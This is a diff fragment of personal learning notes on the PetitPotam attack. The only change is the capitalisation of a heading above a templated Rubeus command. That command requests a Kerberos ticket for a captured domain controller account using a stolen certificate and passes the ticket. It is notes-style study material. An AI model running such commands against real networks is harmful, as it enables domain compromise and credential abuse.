0xKourama/Elbanna-NP-Notes/Learning/Articles/PetitPotam/PetitPotam.md

 ![got-dc2-cert](got-dc2-cert.jpg)

-## 4. use Rubeus on the windows machine to request a TGT for that account using the certificate
+## 4. Use Rubeus on the windows machine to request a TGT for that account using the certificate

 `.\Rubeus.exe asktgt /outfile:kirbi /dc:<DOMAINCONTROLLER> /domain:<DOMAIN_FQDN> /user:<CAPTURED_DC_COMPUTER_ACCOUNT_NAME> /ptt /certificate:<CAPTURED_BASE64_CERTIFICATE>`